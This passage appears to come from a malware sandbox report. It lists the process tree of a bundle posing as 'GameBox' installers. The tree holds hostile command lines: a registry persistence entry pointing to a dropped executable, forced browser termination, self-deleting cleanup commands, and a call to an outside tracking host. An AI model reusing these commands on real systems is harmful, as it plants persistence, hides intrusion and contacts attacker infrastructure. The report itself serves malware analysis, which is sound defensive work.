                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            PID:7836
                                                                                                                                                          • C:\Users\Admin\Documents\2Wab69WAwQidMC7onnwb6G__.exe
                                                                                                                                                            "C:\Users\Admin\Documents\2Wab69WAwQidMC7onnwb6G__.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:7964
                                                                                                                                                              • C:\Users\Admin\Documents\2Wab69WAwQidMC7onnwb6G__.exe
                                                                                                                                                                "C:\Users\Admin\Documents\2Wab69WAwQidMC7onnwb6G__.exe"
                                                                                                                                                                7⤵
                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                PID:6524
                                                                                                                                                            • C:\Users\Admin\Documents\oDXtrbMgShEa0g_wlCeMV1dy.exe
                                                                                                                                                              "C:\Users\Admin\Documents\oDXtrbMgShEa0g_wlCeMV1dy.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              PID:8040
                                                                                                                                                              • C:\Users\Admin\Documents\oDXtrbMgShEa0g_wlCeMV1dy.exe
                                                                                                                                                                "C:\Users\Admin\Documents\oDXtrbMgShEa0g_wlCeMV1dy.exe"
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:9064
                                                                                                                                                              • C:\Users\Admin\Documents\2M64htbKyyqacg8aKq_sjx9m.exe
                                                                                                                                                                "C:\Users\Admin\Documents\2M64htbKyyqacg8aKq_sjx9m.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:9084
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-I1L8P.tmp\2M64htbKyyqacg8aKq_sjx9m.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-I1L8P.tmp\2M64htbKyyqacg8aKq_sjx9m.tmp" /SL5="$703D6,138429,56832,C:\Users\Admin\Documents\2M64htbKyyqacg8aKq_sjx9m.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:9140
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-O222B.tmp\Setup.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-O222B.tmp\Setup.exe" /Verysilent
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:8712
                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                          9⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                          PID:5228
                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629480183 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:8600
                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:6928
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmp6EBF_tmp.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\tmp6EBF_tmp.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:6536
                                                                                                                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                          "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:7480
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:7616
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                cmd
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:6220
                                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                    findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:7848
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                      Esplorarne.exe.com i
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      PID:8540
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                        10⤵
                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        PID:5580
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                          11⤵
                                                                                                                                                                                            PID:8856
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                              12⤵
                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                              PID:8500
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                13⤵
                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                PID:5160
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                    PID:8400
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                      PID:8516
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                        PID:8076
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                          PID:6704
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                            18⤵
                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                            PID:7268
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                              19⤵
                                                                                                                                                                                                                PID:4184
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                  PID:4364
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                    21⤵
                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                    PID:388
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                      22⤵
                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                      PID:5976
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                        23⤵
                                                                                                                                                                                                                          PID:6768
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                            24⤵
                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                            PID:2876
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                              25⤵
                                                                                                                                                                                                                                PID:1552
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                  26⤵
                                                                                                                                                                                                                                    PID:7392
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                      27⤵
                                                                                                                                                                                                                                        PID:9088
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                          28⤵
                                                                                                                                                                                                                                            PID:1016
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                              29⤵
                                                                                                                                                                                                                                                PID:8648
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                  30⤵
                                                                                                                                                                                                                                                    PID:6924
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                      31⤵
                                                                                                                                                                                                                                                        PID:8624
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                          32⤵
                                                                                                                                                                                                                                                            PID:9112
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                              33⤵
                                                                                                                                                                                                                                                                PID:8916
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                  34⤵
                                                                                                                                                                                                                                                                    PID:3880
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                      35⤵
                                                                                                                                                                                                                                                                        PID:4128
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                          36⤵
                                                                                                                                                                                                                                                                            PID:9032
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                              37⤵
                                                                                                                                                                                                                                                                                PID:6288
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                  38⤵
                                                                                                                                                                                                                                                                                    PID:6768
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                      39⤵
                                                                                                                                                                                                                                                                                        PID:8492
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                          40⤵
                                                                                                                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                                                                                                                          PID:8624
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                            ping GFBFPSXA -n 30
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                            PID:8772
                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:6860
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-58E6M.tmp\MediaBurner2.tmp
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-58E6M.tmp\MediaBurner2.tmp" /SL5="$203C8,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        PID:6256
                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:6852
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:6448
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                            PID:6864
                                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:6844
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-58E6N.tmp\VPN.tmp
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-58E6N.tmp\VPN.tmp" /SL5="$20390,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                          PID:6196
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-2U26E.tmp\Setup.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-2U26E.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:3316
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-EUI8M.tmp\Setup.tmp
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-EUI8M.tmp\Setup.tmp" /SL5="$30306,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-2U26E.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                PID:5508
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                  PID:8400
                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                    tapinstall.exe remove tap0901
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                    PID:4556
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                    PID:6060
                                                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                      tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                      PID:8476
                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                    PID:8816
                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                    PID:3052
                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                            PID:6828
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629480183 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                              PID:7348
                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:6820
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-RSPK9.tmp\Inlog.tmp
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-RSPK9.tmp\Inlog.tmp" /SL5="$3034E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                              PID:6228
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-PMLS2.tmp\Setup.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-PMLS2.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                  PID:5792
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-HF5KG.tmp\Setup.tmp
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-HF5KG.tmp\Setup.tmp" /SL5="$10640,17367683,721408,C:\Users\Admin\AppData\Local\Temp\is-PMLS2.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                    PID:7704
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-2KGPA.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                        PID:7364
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                          expand C:\Users\Admin\AppData\Local\Temp\is-2KGPA.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                          PID:6324
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                          PID:7260
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                              PID:9092
                                                                                                                                                                                                                                          • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                                                                                                                                            "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                              PID:6660
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                              PID:7000
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-2KGPA.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-2KGPA.tmp\{app}\vdi_compiler"
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                PID:8984
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-2KGPA.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                    PID:8184
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                      ping localhost -n 4
                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                      PID:2772
                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          PID:6812
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:5260
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                taskkill /im runvd.exe /f
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                PID:8144
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                PID:7556
                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                    PID:2204
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:3136
                                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
